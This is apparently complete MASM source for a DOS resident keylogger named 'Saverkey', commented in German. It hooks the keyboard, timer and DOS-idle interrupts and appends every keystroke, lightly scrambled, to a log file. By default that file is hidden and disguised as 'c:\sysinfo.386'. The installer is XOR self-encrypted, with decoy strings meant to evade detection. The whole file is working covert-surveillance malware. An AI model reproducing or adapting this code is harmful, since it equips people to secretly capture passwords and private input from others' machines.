;**************************************************************************
;  Saverkey - Das ultimative Consolen-Protokollprogramm
;**************************************************************************

                       .MODEL tiny
                     buffersize EQU 100
                     puffersize EQU buffersize-2
                 buffer_save_at EQU buffersize-10
.STACK
.CODE
                        ORG 100h
                        .STARTUP
zeiger_auf_filename     equ this word
                        jmp install
;**************************************************************************
; Neuer Tastaturhandler 16h
;**************************************************************************
new_int_16              PROC
                        .IF ax == "PS" ; meine Kennung?
                            mov di,cs
                            mov ds,di ;Wichtig: in DS und DI Segment des Handlers
                            mov ax,"LK" ;Kennung
                            iret

                        .ELSEIF ah == 0 || ah == 10h ; Soll Taste erfragt werden?
                                                     ; auch erweitert
                            pushf
                            db 09ah ;CALL far ptr
old_int_16                  equ this dword
                            db "C&P!"
                            call schreibweg  ; sichern!
                            iret

                        .ELSEIF cs:save_now_flag == 1 ; Abspeichern kann nicht
                                                      ; schaden...
                            push ax
                            xor ax,ax
                            call schreibweg
                            pop ax
                        .ENDIF
                        jmp cs:old_int_16
new_int_16              ENDP
;**************************************************************************
; Neuer Timer-Interrupt
;**************************************************************************
new_int_8               PROC
                        ; Sind schon 30 sec seit dem letzten Tastenanschlag
                        ; vergangen ?
                        .IF cs:savecounter == 0
                            mov cs:savecounter, 546 ; = 30 Sekunden
                            mov cs:save_now_flag, 1
                        .ENDIF
                        dec cs:savecounter
                        db 0eah
old_int_8               equ this dword
                        db "(:-)"
new_int_8               ENDP
;**************************************************************************
; Neuer DOS-Idle - Server
;**************************************************************************
new_int_28              PROC
                        .IF cs:save_now_flag != 0 ; Sollte eigentlich was
                                                  ; gespeichert werden?
                            push ax
                            mov ax, "28"
                            call schreibweg
                            pop ax
                        .ENDIF
                        db 0eah
old_int_28              equ this dword
                        db "(:-)"
new_int_28              ENDP
;**************************************************************************
; Residente Daten

savecounter             dw 0
save_now_flag           db 0
in_dos_flag             dword ?

;**************************************************************************
; Speichere Taste weg
;**************************************************************************
schreibweg              PROC USES bx cx dx si ds
                        push cs
                        pop ds

                        mov savecounter, 546 ; = 30 Sekunden

                        mov si,0
puffercounter           equ this word -2

                        .IF si >= buffer_save_at || save_now_flag != 0

                            mov save_now_flag, 1 ; Fr Fehlerfall

                            lds bx, in_dos_flag

                            mov bx, ds:[bx]
                            push cs
                            pop ds              ; In-Dos = BH
                                                ; Critical Error = BL

                            .IF bl == 0 && (bh == 0 || ax == "28")
                                ; Nur wenn nicht im DOS und nicht Critical error
                                ; oder Idle
                                mov save_now_flag, 0
                                .IF si > 0 ; Nur schreiben, wenn auch
                                           ; wirklich etwas im Puffer steht
                                    call schreib2file
                                .ENDIF
                            .ENDIF
                        .ENDIF

                        ; Extended key oder idle-Aufruf oder buffer voll?
                        .IF al != 0 && al != 0e0h && ax != "28" && si < buffersize
                            push ax
                            xor al, "P"
                            add al, "S"
                            mov ds:puffer[si],al
                            inc si
                            pop ax
                        .ENDIF
                        mov ds:puffercounter,si

                        ret
schreibweg              ENDP
;**************************************************************************
; Schreibe Puffer in File
; SI = Puffercounter
;**************************************************************************
schreib2file            PROC USES ax
                        mov ax,3d02h
                        mov dx,ds:zeiger_auf_filename
                        int 21h
                        .IF !carry?
                            mov bx,ax
                            sub cx,cx
                            sub dx,dx
                            mov ax,4202h
                            int 21h
                            mov cx,si
                            mov dx,offset puffer
                            mov ah,40h
                            int 21h
                            mov ah,3eh
                            int 21h
                        .ENDIF
                        sub si,si
                        ret
schreib2file            ENDP

puffer                  equ this byte

;**************************************************************************
;**************************************************************************
;**************************************************************************

decrypt_2               PROC
                        mov si, offset suchcode2
                        mov di, si
                        mov cx, offset end_of_file - offset suchcode2
                        mov bx, offset suchcode+1
                        .REPEAT
                            lodsb
                            xor al, [bx]
                            .IF si & 1
                                inc bx
                            .ELSE
                                dec bx
                            .ENDIF
                            stosb
                        .UNTILCXZ
                        pop ax
                        add ax, 4
                        push ax
                        ret
decrypt_2               ENDP

suchcode                db "CRYPT"

;*************************************
;* Transienter Teil

install                 PROC
                        mov si, 103h
                        mov di, si
                        mov cx, offset install - 103h
                        mov bx, offset install + 1
                        .REPEAT
                            lodsb
                            xor al, [bx]
                            .IF si & 1
                                inc bx
                            .ELSE
                                dec bx
                            .ENDIF
                            stosb
                        .UNTILCXZ

                        call decrypt_2

suchcode2               db ".DLL"

                       ; push cs
                       ; pop ds       Standard am Anfang

                     ; DOS-Version erfragen

                        mov ah,30h
                        int 21h
                        .IF al < 3 || (al == 3 && ah < 1)
                            mov dx, offset wrongdos
                            jmp printende
                        .ENDIF

                     ; Alle Interruptroutinen sichern
                        mov ax, 3516h
                        int 21h
                        mov word ptr old_int_16[0], bx
                        mov word ptr old_int_16[2], es

                        mov ax, 3508h
                        int 21h
                        mov word ptr old_int_8[0], bx
                        mov word ptr old_int_8[2], es

                        mov ax, 3528h
                        int 21h
                        mov word ptr old_int_28[0], bx
                        mov word ptr old_int_28[2], es

                     ; Adresse des InDosflags ermitteln

                        mov ah,34h
                        int 21h

                        dec bx
                        mov word ptr in_dos_flag[0], bx
                        mov word ptr in_dos_flag[2], es

                        push cs
                        pop es

;**************************************************************************
; Schon installiert?
                        mov ax,"PS"
                        int 16h
                        .IF ax == "LK" ; Schon installiert?
                            mov si,ds:puffercounter
                            .IF si != 0
                                call schreib2file
                            .ENDIF

                            ;DI und DS - segment of Handler
                            .IF word ptr cs:old_int_16[0] != offset new_int_16 || \
                                word ptr cs:old_int_16[2] != di || \
                                word ptr cs:old_int_8[0] != offset new_int_8 || \
                                word ptr cs:old_int_8[2] != di || \
                                word ptr cs:old_int_28[0] != offset new_int_28 || \
                                word ptr cs:old_int_28[2] != di
                                push cs
                                pop ds
                                mov dx,offset cantdeinstall
                                jmp printende
                            .ENDIF

                            mov dx,ds:word ptr old_int_16[0]
                            mov ds,ds:word ptr old_int_16[2]

                            mov ax,2516h
                            int 21h

                            mov es,di

                            mov dx,es:word ptr old_int_8[0]
                            mov ds,es:word ptr old_int_8[2]

                            mov ax, 2508h
                            int 21h

                            mov dx,es:word ptr old_int_28[0]
                            mov ds,es:word ptr old_int_28[2]

                            mov ax, 2528h
                            int 21h

                            mov ah,49h
                            jmp int_21h_ende
                        .ENDIF
                        mov si,81h
                        sub ah,ah
                        sub dx,dx
                        .WHILE 1
                           lodsb
                           cmp al,13
                           je ende_gelaende
                           .IF al != " " && dx == 0
                               inc ah
                               mov dx,si
                               dec dx
                               mov zeiger_auf_filename,dx
                           .ENDIF
                        .ENDW
ende_gelaende:          .IF ah == 0 ;* Wenn gar kein Name bergeben wurde
                                    ; Default namen nehmen

                            mov si, offset default_name
                            mov di, 81h
                            mov cx, LENGTHOF default_name
                            rep movsb
                            mov dx, 81h
                            mov zeiger_auf_filename, dx

                        .ELSE       ; Ansonsten den Return-Code mit einem
                                    ; terminierenden NULL berschreiben
                            dec si
                            mov byte ptr ds:[si],0
                        .ENDIF
                        mov ax,3d00h
                        int 21h
                        .IF carry?
                            mov ah,3ch
                            mov cx,2 ;Hidden
                            int 21h
                            .IF carry?
printusage:                     mov dx,offset usage
printende:                      mov ah,9
int_21h_ende:                   int 21h
                                ret
                            .ENDIF
                        .ENDIF
                        mov bx,ax
                        mov ah,3eh
                        int 21h

                        mov dx,offset new_int_16
                        mov ax,2516h
                        int 21h

                        mov dx, offset new_int_8
                        mov al, 08h
                        int 21h

                        mov dx, offset new_int_28
                        mov al, 28h
                        int 21h

                        mov ah,49h
                        mov es,ds:[02ch]
                        int 21h  ;Environment freigeben

                        mov dx, offset puffer+buffersize+1
                        int 27h
install                 ENDP
;**************************************
;* Daten 2

wrongdos                db "DOS Version 3.1 or higher required!",13,10,"$"
cantdeinstall           db "Can't remove!",13,10,"$" ; Can't remove
usage                   db ">this_exec full_path_to_logfile",13,10,"$"
default_name            db "c:\sysinfo.386", 0
end_of_file             equ this byte
                        END
